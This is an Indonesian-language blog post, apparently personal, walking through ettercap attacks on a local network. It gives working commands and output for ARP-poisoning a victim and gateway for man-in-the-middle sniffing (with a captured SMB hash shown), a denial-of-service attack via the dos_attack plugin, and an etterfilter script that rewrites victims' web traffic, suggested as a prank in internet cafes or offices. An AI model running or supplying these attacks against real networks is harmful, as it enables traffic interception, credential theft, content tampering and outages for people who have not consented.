I am [in]Security Junkie

………….Bermain-main dengan ettercap………………
//–Intro

Sebenarnya tulisan ini hanya ingin mengenang tingkah penulis
waktu masih kuliah dulu, just remember that!
Risiko tehadap tulisan ini ditanggung sama penumpang

//–Got the point

Ok, sebelum saya malas meneruskan tulisan ini, kita langsung
pada intinya saja [saya adalah penulis yg buruk :(]

Ettercap adalah salah satu tools sniffer packet data dalam
jaringan yg cukup populer, definisi ettercap bisa kamu baca
dalam dokumentasi bawaan ettercap itu sendiri seperti potongan
manual-nya di bawah ini…
———————————————————————–
DESCRIPTION
Ettercap was born as a sniffer for switched LAN (and obviously even
“hubbed” ones), but during the development process it has gained more
and more features that have changed it to a powerful and flexible tool
for man-in-the-middle attacks. It supports active and passive dissec-
tion of many protocols (even ciphered ones) and includes many features
for network and host analysis (such as OS fingerprint).
———————————————————————–
Seperti kutipan diatas, bahwa ettercap mempunyai kemampuan dalam
melakukan capture packet data dalam beberapa jenis protokol seperti
http, ftp dan lainya! ok, stop the theory!

–|Man in the midle attack

Salah satu feature andalan dari ettercap adalah melakukan serangan
MITM yg melakukan proses poison terhadap table arp pada korban dan
default gateway…

PoC:
skenario
attacker: 192.168.0.155 –> 00:0C:29:F8:D5:FC
korban : 192.168.0.140 –> 00:17:31:23:46:E3
gateway : 192.168.0.1 –> 00:1B:11:47:D4:07

sekarang, sebagai attacker yg harus kita lakukan adalah meracuni
table arp mesin korban dan gateway:
BT #ettercap -o -T -P repoison_arp -M arp:remote /192.168.0.140/
/192.168.0.1/

sehingga, pada mesin korban, tabel arp akan kelihatan seperti:

C:\>arp -a

Interface: 192.168.0.140 — 0×4
Internet Address Physical Address Type
192.168.0.1 00-0c-29-f8-d5-fc dynamic
192.168.0.155 00-0c-29-f8-d5-fc dynamic

pada mesin gateway:

root@gateway:/# arp -a
? (192.168.0.140) at 00:0C:29:F8:D5:FC [ether] on eth0
? (192.168.0.155) at 00:0C:29:F8:D5:FC [ether] on eth0

pada mesin attacker:

BT ~ # arp -a
? (192.168.0.1) at 00:1B:11:47:D4:07 [ether] on eth0
? (192.168.0.140) at 00:17:31:23:46:E3 [ether] on eth0

dengan kondisi seperti sekarang kita tinggal memasang ethereal atau
wireshark untuk mengcapture packet data [ atau bisa juga dengan memakai
ettercap, tergantung selera anda masing-masing ]

ehh, jangan lupa aktifkan ip_forwarding sehingga paket dari korban ke
server dansebaliknya tetap terkirim dengan baik, tentunya setelah
melewati mesin kita
———————————————–
BT # echo “1″ > /proc/sys/net/ipv4/ip_forward
BT # cat /proc/sys/net/ipv4/ip_forward
1
———————————————–

–| DoS Attack

Selain kemampuan melakukan arp poison, ettercap juga sangat disukai oleh
para geek karena kemampuannya melakukan serangan Dos,.. let’s try!

BT # ettercap -i eth0 -T -q -M arp // //

ok, hati-hati menggunakan perintah diatas, karena bisa menyebapkan trafik
jaringan anda akan sangat padat, dan bisa membuat jaringan menjadi down,..
sekrangan kita coba spesifik ke satu ip/host

BT # ettercap -i eth0 -T -q -M arp /192.168.0.140/ //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0… (Ethernet)

eth0 -> BC:7B:5B:5D:B7:26 192.168.0.129 255.255.255.0

SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
* |==================================================>| 100.00 %

95 hosts added to the hosts list…

ARP poisoning victims:

GROUP 1 : 192.168.0.140 00:17:31:23:46:E3

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing…

Text only Interface activated…
Hit ‘h’ for inline help

Inline help:

[vV] - change the visualization mode
[pP] - activate a plugin
[lL] - print the hosts list
[oO] - print the profiles list
[cC] - print the connections list
[sS] - print interfaces statistics
[<space>] - stop/cont printing packets
[qQ] - quit

Available plugins :

[0] arp_cop 1.1 Report suspicious ARP activity
[0] autoadd 1.2 Automatically add new victims in the target range
[0] chk_poison 1.1 Check if the poisoning had success
[0] dns_spoof 1.1 Sends spoofed dns replies
[0] dos_attack 1.0 Run a d.o.s. attack against an IP address
[0] dummy 3.0 A plugin template (for developers)
—-dipotong—————-
Plugin name (0 to quit): dos_attack
SMB : 192.168.0.140:139 -> USER: Administrator HASH: Administrator:”":”":3EF5EEC9951A8AF600000000000000000000000000000000:
7:A9849BB957C3C3D0 DOMAIN:
[informasi sedikit di modif, -penulis]
Activating dos_attack plugin…

Insert victim IP: 192.168.0.140
Insert unused IP: 192.168.0.141
dos_attack: Starting scan against 192.168.0.140 [Fake Host: 192.168.0.141]
dos_attack: Port 139 added
dos_attack: Port 445 added
dos_attack: Starting attack…
—–tunggu sampe target akan mereset sendiri pc-nya————–

–| Bonus [Numpang tenar di warnet or dikantor ;)]

buka shell linux kamu dan buat script seperti dibawah ini, kemudian simpan
dengan nama codec.filter:
————start—————————————-

##————————————————–

## code take from http://www.irongeek.com

##Was edit by am_007

##————————————————–

if (ip.proto == TCP && tcp.dst == 80) {

if (search(DATA.data, “Accept-Encoding”)) {
replace(”Accept-Encoding”, “Accept-Rubbish!”);
msg(”zapped Accept-Encoding!\n”);
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace(”img src=”, “img src=\”http://www.hillenius.net/files/freebsd.png\” “);
replace(”IMG src=”, “img src=\”http://www.hillenius.net/files/freebsd.png\” “);
#lokasi gambar, silahkan diganti dengan foto kamu misalnya
msg(”Filter Run.\n”);
}
————-end—————————————
kemudian lakukan kompilasi dengan etterfilter

BT # etterfilter codec.filter -o codec.ef

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA

12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

Parsing source file ‘codec.filter’ done.

Unfolding the meta-tree done.

Converting labels to real offsets done.

Writing output to ‘codec.ef’ done.

-> Script encoded into 16 instructions.

setelah itu racuni arp table pada mesin koraban kamu, atau mesin-mesin dalam
jaringan kamu,

BT #ettercap -T -q -F codec.ef -M ARP // //

tapi sekali lagi, melakukan arp poison terhadap seluruh mesin dalam jaringan
bisa menyebabkan terjadi lonjakan trafik yg cukup tinggi sehingga berpeluang
terjadinya trafic down, jadi itu tergantung kamu

tapi untuk memastikannya, kamu bisa coba pada mesin kamu atau teman kamu sendiri.

BT #ettercap -T -q -F codec.ef -M ARP /192.168.0.140/ //
BT script # ettercap -T -q -F codec.ef -M ARP /192.168.0.140/ //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from codec.ef…
Listening on eth0… (Ethernet)

eth0 -> BC:7B:5B:5D:B7:26 192.168.0.129 255.255.255.0

SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
* |==================================================>| 100.00 %

95 hosts added to the hosts list…

ARP poisoning victims:

GROUP 1 : 192.168.0.140 00:17:31:23:46:E3

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing…

Text only Interface activated…
Hit ‘h’ for inline help

Filter Run.
zapped Accept-Encoding!
Filter Run.
Filter Run.
Filter Run.

Nah…kalau tampilan dah seperti diatas, berarti injeksi paket yg kamu lakukan
sudah berhasil,

–// Penutup

Mungkin masih banyak yg bertanya, kok bisa gitu yah?, atau kenapa harus begini?
dalam tulisanini, saya memang malaz memberikan banyak teori, namanya juga ‘bermain’
hehe..
yuk ah, happy playing kids!!

–//Referensi
1. http://www.irongeek.com
2. http://en.wikipedia.org/wiki/Ettercap_(computing)
3. http://www.openmaniak.com/ettercap.php